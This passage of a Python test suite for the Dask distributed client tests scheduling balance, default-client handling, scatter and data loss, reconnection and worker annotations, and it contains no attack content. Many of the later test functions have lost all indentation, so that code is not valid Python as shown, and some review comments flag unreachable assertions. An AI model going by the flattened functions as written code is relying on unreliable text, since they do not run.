def test_client_replicate_sync(c):
    """Synchronous replicate; n=0 is rejected with ValueError."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    c.replicate([x, y], n=2)

    who_has = c.who_has()
    assert len(who_has[x.key]) == len(who_has[y.key]) == 2

    with pytest.raises(ValueError):
        c.replicate([x], n=0)

    assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
    """Task duration estimates adapt quickly when observed runtimes change."""
    future = c.submit(slowinc, 1, delay=0.2)  # slow
    await wait(future)
    assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4

    futures = c.map(slowinc, range(10), delay=0)  # very fast
    await wait(futures)

    assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
    """After very fast warm-up tasks, later work is still spread over both
    workers rather than piling onto one."""
    x = c.submit(inc, 1, workers=a.address)  # very fast
    y = c.submit(inc, 2, workers=b.address)  # very fast
    await wait([x, y])

    futures = c.map(inc, range(2, 11))
    await wait(futures)
    assert any(f.key in a.data for f in futures)
    assert any(f.key in b.data for f in futures)

    # assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
    """The first two tasks on a fresh cluster land on different workers."""
    x, y = c.map(inc, [1, 2])
    await wait([x, y])
    assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
    """Adjacent tasks are co-located on the same worker. (Skipped.)"""
    w, x, y, z = c.map(inc, [1, 2, 3, 4])
    await wait([w, x, y, z])

    groups = [set(a.data), set(b.data)]

    assert {w.key, x.key} in groups
    assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
    """Four submitted tasks end up one per single-threaded worker."""
    L = [c.submit(slowinc, i) for i in range(4)]
    await wait(L)
    for w in workers:
        assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
    """Tasks spread evenly even when a broadcast dependency already lives on
    every worker (so data locality gives no worker an edge)."""
    [x] = await c.scatter([10], broadcast=True)
    L = [c.submit(slowinc, x, pure=False) for i in range(4)]
    await wait(L)
    for w in workers:
        assert len(w.data) == 2  # the broadcast x plus one result
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
    """The scheduler keeps every worker thread busy for varying task delays."""
    for delay in [0, 0.01, 0.1]:
        futures = c.map(slowinc, range(100), delay=delay)
        futures = c.map(slowinc, futures, delay=delay / 10)

        while not s.tasks:
            # NOTE(review): this branch is unreachable — `s.tasks` cannot be
            # truthy inside `while not s.tasks`, so the saturation assertion
            # never runs. Likely the loop condition or the guard is wrong;
            # confirm intent before changing scheduling-sensitive timing.
            if s.tasks:
                assert all(
                    len(p) >= 20
                    for w in s.workers.values()
                    for p in w.processing.values()
                )
            await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
    """As above, but with randomly-timed tasks."""
    # NOTE(review): the loop variable `delay` is never used below — `scale`
    # is fixed at 0.1 — and the inner `if s.tasks:` is unreachable inside
    # `while not s.tasks` (see test_scheduler_saturates_cores).
    for delay in [0, 0.01, 0.1]:
        futures = c.map(randominc, range(100), scale=0.1)

        while not s.tasks:
            if s.tasks:
                assert all(
                    len(p) >= 20
                    for w in s.workers.values()
                    for p in w.processing.values()
                )
            await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
    """Cancelling an in-flight task clears it from every worker's processing
    set and leaves scheduler state valid.

    Fix: removed an unused ``pytest.importorskip("dask.array")`` — it made
    the test skip on environments without dask.array even though dask.array
    is never used here.
    """
    x = c.submit(slowinc, 1, delay=0.2)
    while not s.tasks:
        await asyncio.sleep(0.01)

    await c.cancel(x)

    while any(v for w in s.workers.values() for v in w.processing):
        await asyncio.sleep(0.01)

    s.validate_state()
def test_default_get():
    """`set_as_default` controls whether a Client installs itself as dask's
    default scheduler (and its config, e.g. shuffle='tasks'), and the previous
    default must be restored whenever such a client closes or exits its
    context manager.
    """
    with cluster() as (s, [a, b]):
        # Baseline: no distributed client configured yet.
        pre_get = dask.base.get_scheduler()
        pytest.raises(KeyError, dask.config.get, "shuffle")
        with Client(s["address"], set_as_default=True) as c:
            assert dask.base.get_scheduler() == c.get
            assert dask.config.get("shuffle") == "tasks"

        # Leaving the context restores the prior scheduler and config.
        assert dask.base.get_scheduler() == pre_get
        pytest.raises(KeyError, dask.config.get, "shuffle")

        c = Client(s["address"], set_as_default=False)
        assert dask.base.get_scheduler() == pre_get
        pytest.raises(KeyError, dask.config.get, "shuffle")
        c.close()

        c = Client(s["address"], set_as_default=True)
        assert dask.config.get("shuffle") == "tasks"
        assert dask.base.get_scheduler() == c.get
        c.close()
        assert dask.base.get_scheduler() == pre_get
        pytest.raises(KeyError, dask.config.get, "shuffle")

        # set_as_default defaults to True.
        with Client(s["address"]) as c:
            assert dask.base.get_scheduler() == c.get

        with Client(s["address"], set_as_default=False) as c:
            assert dask.base.get_scheduler() != c.get
        assert dask.base.get_scheduler() != c.get

        # Nested defaults: innermost client wins, then the outer one is
        # restored, then the pre-existing scheduler.
        with Client(s["address"], set_as_default=True) as c1:
            assert dask.base.get_scheduler() == c1.get
            with Client(s["address"], set_as_default=True) as c2:
                assert dask.base.get_scheduler() == c2.get
            assert dask.base.get_scheduler() == c1.get
        assert dask.base.get_scheduler() == pre_get
@gen_cluster()
async def test_set_as_default(s, a, b):
    """`default_client()` tracks the most recent client created with
    set_as_default=True, and falls back (raising ValueError) when none remain.
    """
    with pytest.raises(ValueError):
        default_client()

    async with Client(s.address, set_as_default=False, asynchronous=True) as c1:
        # A non-default client must not become the global default.
        with pytest.raises(ValueError):
            default_client()
        async with Client(s.address, set_as_default=True, asynchronous=True) as c2:
            assert default_client() is c2
            async with Client(s.address, set_as_default=True, asynchronous=True) as c3:
                assert default_client() is c3
                async with Client(
                    s.address, set_as_default=False, asynchronous=True
                ) as c4:
                    assert default_client() is c3

                    # Even after c4 loses its scheduler connection, the
                    # default should still be c3, not c4.
                    await c4.scheduler_comm.close()
                    while c4.status != "running":
                        await asyncio.sleep(0.01)
                    assert default_client() is c3

    # All default-capable clients are closed; no default remains.
    with pytest.raises(ValueError):
        default_client()
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
    """Client.processing reports the scheduler's per-worker processing sets,
    and can be restricted to a subset of workers.
    """
    processing = await c.processing()
    assert processing == valmap(tuple, s.processing)

    # allow_other_workers lets work spill from `a` onto `b`.
    futures = c.map(
        slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
    )

    await asyncio.sleep(0.2)

    x = await c.processing()
    assert set(x) == {a.address, b.address}

    x = await c.processing(workers=[a.address])
    assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
    """Smoke-test the scheduler RPC introspection endpoints (ncores, has_what,
    nbytes, who_has), with and without worker/key filters, against the
    scheduler's own state.
    """
    futures = c.map(inc, range(10))
    await wait(futures)

    x = await c.scheduler.ncores()
    assert x == s.nthreads

    x = await c.scheduler.ncores(workers=[a.address])
    assert x == {a.address: s.nthreads[a.address]}

    x = await c.scheduler.has_what()
    assert valmap(sorted, x) == valmap(sorted, s.has_what)

    x = await c.scheduler.has_what(workers=[a.address])
    assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}

    x = await c.scheduler.nbytes(summary=False)
    assert x == s.get_nbytes(summary=False)

    x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
    assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}

    x = await c.scheduler.who_has()
    assert valmap(sorted, x) == valmap(sorted, s.who_has)

    x = await c.scheduler.who_has(keys=[futures[0].key])
    assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
    """Assert two dicts have identical key sets and element-wise equal values.

    Values are compared after conversion to lists, so iterables of any type
    match as long as their contents and ordering agree.
    """
    assert set(expected.keys()) == set(actual.keys())
    for key, actual_value in actual.items():
        assert list(expected[key]) == list(actual_value)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
    """has_what / who_has must degrade gracefully when workers die: dead
    workers disappear from unfiltered results but appear (empty) when
    requested explicitly.
    """
    x = c.submit(inc, 1, workers=[u.address])
    y = await c.scatter(3, workers=[v.address])
    await wait([x, y])

    ua, va, wa = u.address, v.address, w.address

    d = await c.scheduler.has_what()
    assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
    d = await c.scheduler.has_what(workers=[ua, va])
    assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
    d = await c.scheduler.who_has()
    assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
    d = await c.scheduler.who_has(keys=[x.key, y.key])
    assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})

    # Kill the two workers holding data; only `w` survives.
    await u.close()
    await v.close()

    d = await c.scheduler.has_what()
    assert_dict_key_equal(d, {wa: []})
    d = await c.scheduler.has_what(workers=[ua, va])
    assert_dict_key_equal(d, {ua: [], va: []})
    # The scattered key cannot be recomputed so it is forgotten
    d = await c.scheduler.who_has()
    assert_dict_key_equal(d, {x.key: []})
    # ... but when passed explicitly, it is included in the result
    d = await c.scheduler.who_has(keys=[x.key, y.key])
    assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
    client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
    """A task that kills its worker process (sys.exit) must surface as
    KilledWorker to the client, be logged by the scheduler, and record which
    worker died.
    """
    f = c.submit(sys.exit, 0)
    with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
        with pytest.raises(KilledWorker) as info:
            await f

    text = logger.getvalue()
    assert f.key in text

    assert info.value.last_worker.nanny in {a.address, b.address}
    await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
    """Synchronous Client.processing: empty at rest, then keyed by the worker
    address(es) requested (single address or list).
    """
    processing = c.processing()
    assert not any(v for v in processing.values())

    futures = c.map(
        slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
    )

    sleep(0.2)

    aa = a["address"]
    # NOTE(review): `bb` and this reassignment of `processing` are unused —
    # the assertions below call c.processing() themselves.
    bb = b["address"]
    processing = c.processing()

    assert set(c.processing(aa)) == {aa}
    assert set(c.processing([aa])) == {aa}

    c.cancel(futures)
def test_close_idempotent(c):
    """Client.close must be safe to call repeatedly (a no-op after the first)."""
    for _ in range(3):
        c.close()
@nodebug
def test_get_returns_early(c):
    """Client.get should return as soon as one task errors, without waiting
    for the slow sibling task, and should release its transient futures —
    unless a key is also held as a live Future by the caller.
    """
    start = time()
    with suppress(RuntimeError):
        result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
    # The (sleep, 1) task must not delay the error by a full second.
    assert time() < start + 0.5
    # Futures should be released and forgotten
    wait_for(lambda: not c.futures, timeout=0.1)
    wait_for(lambda: not any(c.processing().values()), timeout=3)

    x = c.submit(inc, 1)
    x.result()

    with suppress(RuntimeError):
        result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
    # x is still referenced by the caller, so it survives the failed get.
    assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True, timeout=60)
async def test_Client_clears_references_after_restart(c, s, a, b):
    """Client.restart must drop all future refcounts, and deleting the stale
    Future afterwards must not resurrect its entry.
    """
    x = c.submit(inc, 1)
    assert x.key in c.refcount

    await c.restart()
    assert x.key not in c.refcount

    key = x.key
    del x
    # NOTE(review): function-local import; conventionally this would live at
    # module top, but it is harmless here.
    import gc

    gc.collect()
    await asyncio.sleep(0)

    assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
    """A restart that exceeds its timeout should log a clear message."""
    client_logger = logging.getLogger("distributed.client")
    with captured_logger(client_logger) as logger:
        await c.restart(timeout="0.5s")
    assert "Restart timed out after 0.50 seconds" in logger.getvalue()
def test_get_stops_work_after_error(c):
    """After Client.get raises, outstanding sibling tasks should be cancelled
    promptly rather than running to completion.
    """
    with pytest.raises(RuntimeError):
        c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])

    start = time()
    # The 1.5s sleep task must be torn down well before it finishes.
    while any(c.processing().values()):
        sleep(0.01)
        assert time() < start + 0.5
def test_as_completed_list(c):
    """Iterating as_completed over a list of futures eventually yields all of them."""
    futures = c.map(inc, range(5))
    completed = [future for future in as_completed(futures)]
    assert set(c.gather(completed)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
    """with_results=True yields (future, result) pairs covering every input future."""
    futures = c.map(inc, range(5))
    pairs = list(as_completed(futures, with_results=True))
    assert set(pluck(1, pairs)) == {1, 2, 3, 4, 5}
    assert set(pluck(0, pairs)) == set(futures)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
    """next_batch returns [] when non-blocking with nothing ready, and when
    blocking returns only futures from the input set until the iterator is
    drained.
    """
    futures = c.map(slowinc, range(2), delay=0.1)
    ac = as_completed(futures)
    assert not ac.is_empty()
    # Nothing has completed yet, so a non-blocking poll is empty.
    assert ac.next_batch(block=False) == []
    assert set(ac.next_batch(block=True)).issubset(futures)
    while not ac.is_empty():
        assert set(ac.next_batch(block=True)).issubset(futures)
    assert ac.is_empty()
    assert not ac.has_ready()
@gen_cluster(nthreads=[])
async def test_status(s):
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
@gen_cluster(client=True)
async def test_async_whowhat(c, s, a, b):
    """Async who_has/has_what return the typed WhoHas/HasWhat mappings with
    tuple values, reflecting where scattered data lives.
    """
    [x] = await c.scatter([1], workers=a.address)
    who_has = await c.who_has()
    has_what = await c.has_what()
    assert type(who_has) is WhoHas
    assert type(has_what) is HasWhat

    assert who_has == {x.key: (a.address,)}
    assert has_what == {a.address: (x.key,), b.address: ()}
def test_client_repr_html(c):
    """Synchronous who_has/has_what return the typed WhoHas/HasWhat mappings.

    NOTE(review): despite its name, this test never exercises any HTML repr —
    it only checks the return types of who_has/has_what.  Presumably those
    types drive the client's HTML rendering; confirm, or rename the test.
    """
    x = c.submit(inc, 1)
    who_has = c.who_has()
    has_what = c.has_what()
    assert type(who_has) is WhoHas
    assert type(has_what) is HasWhat
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
    """A client whose scheduler process dies should transition to
    'connecting', cancel outstanding futures, automatically reconnect when a
    new scheduler appears on the same port, and fail cleanly once the worker
    is gone for good.
    """
    w = Worker("127.0.0.1", 9393, loop=loop)
    loop.add_callback(w.start)

    scheduler_cli = [
        "dask-scheduler",
        "--host",
        "127.0.0.1",
        "--port",
        "9393",
        "--no-dashboard",
    ]
    with popen(scheduler_cli):
        c = Client("127.0.0.1:9393", loop=loop)
        c.wait_for_workers(1, timeout=10)
        x = c.submit(inc, 1)
        assert x.result(timeout=10) == 2

    # Scheduler process has exited: the client should notice and start
    # reconnecting, cancelling the now-unrecoverable future.
    start = time()
    while c.status != "connecting":
        assert time() < start + 10
        sleep(0.01)
    assert x.status == "cancelled"
    with pytest.raises(CancelledError):
        x.result(timeout=10)

    # A fresh scheduler on the same port: the client reconnects, the worker
    # re-registers, and new work succeeds.
    with popen(scheduler_cli):
        start = time()
        while c.status != "running":
            sleep(0.1)
            assert time() < start + 10
        start = time()
        while len(c.nthreads()) != 1:
            sleep(0.05)
            assert time() < start + 10

        x = c.submit(inc, 1)
        assert x.result(timeout=10) == 2

    # Scheduler gone again; polling the stale future should settle on
    # CancelledError (CommClosedError may occur transiently in between).
    start = time()
    while True:
        assert time() < start + 10
        try:
            x.result(timeout=10)
            assert False
        except CommClosedError:
            continue
        except CancelledError:
            break

    sync(loop, w.close, timeout=1)
    c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == Status.closed
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
if time() > start + 10:
if worker == Worker: # this is an esoteric case
print("File descriptors did not clean up")
break
else:
raise ValueError("File descriptors did not clean up")
@gen_cluster()
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
    """scheduler_info returns a dict describing the cluster: two workers and
    a float start timestamp."""
    info = c.scheduler_info()
    assert isinstance(info, dict)
    assert len(info["workers"]) == 2
    assert isinstance(info["started"], float)
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
    """get_versions reports scheduler, client and per-worker versions; check=True
    must not raise on a homogeneous cluster, and `packages=` adds arbitrary
    importable packages to the report.
    """
    requests = pytest.importorskip("requests")
    v = c.get_versions()
    assert v["scheduler"] is not None
    assert v["client"] is not None
    assert len(v["workers"]) == 2
    # NOTE(review): this loop rebinds `v` (the dict being iterated via the
    # pre-evaluated .items() view) and never uses `k` — works, but fragile
    # to read; after the loop `v` is a worker entry, then is rebound again.
    for k, v in v["workers"].items():
        assert v is not None

    c.get_versions(check=True)
    # smoke test for versions
    # that this does not raise

    v = c.get_versions(packages=["requests"])
    assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
    """Scattered data has no recipe to recompute it: when its only holder
    dies, the future is cancelled and the key forgotten by the scheduler.
    """
    [x] = await c.scatter([1], workers=a.address)

    await a.close()
    await asyncio.sleep(0.1)

    assert x.status == "cancelled"
    assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
    """
    Create irreplaceable data on one machine,
    cause a dependent computation to occur on another and complete

    Kill the machine with the irreplaceable data.  What happens to the complete
    result?  How about after it GCs and tries to come back?
    """
    x = await c.scatter(1, workers=a.address)
    xx = c.submit(inc, x, workers=a.address)
    y = c.submit(inc, 1)

    z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
    await wait(z)

    await a.close()

    # The scattered value is lost with the worker...
    while x.status == "finished":
        await asyncio.sleep(0.01)

    # assert xx.status == 'finished'
    assert y.status == "finished"
    # ...but z already completed on `b`, so its result survives.
    assert z.status == "finished"

    zz = c.submit(inc, z)
    await wait(zz)

    zkey = z.key
    del z

    while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
        await asyncio.sleep(0.01)

    xxkey = xx.key
    del xx

    # NOTE(review): this condition combines the three tests with `and`, so
    # the loop exits as soon as ANY clause is false — e.g. the moment zkey
    # reappears in s.tasks.  If the intent was "wait until all three keys
    # are gone", the connectives should be `or` (or the memberships
    # negated).  Confirm the intended semantics before changing.
    while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
        await asyncio.sleep(0.01)
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster()
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert stringify(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster()
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s["address"]) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s["address"]) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@gen_cluster()
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=False):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=False):
total = delayed(sum)(L1)
with dask.annotate(workers=c.address, allow_other_workers=True):
L2 = [delayed(add)(i, total) for i in L1]
with dask.annotate(workers=b.address, allow_other_workers=True):
total2 = delayed(sum)(L2)
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate2(e, s, a, b, c):
def key_to_worker(key):
return a.address
L1 = [delayed(inc)(i) for i in range(4)]
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
with dask.annotate(workers=key_to_worker):
out = e.persist(L1, optimize_graph=False)
await wait(out)
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total, total2]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=True):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=True):
total = delayed(sum)(L1)
with dask.annotate(workers=[c.address]):
L2 = [delayed(add)(i, total) for i in L1]
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.compute(L1 + L2 + [total], optimize_graph=False)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
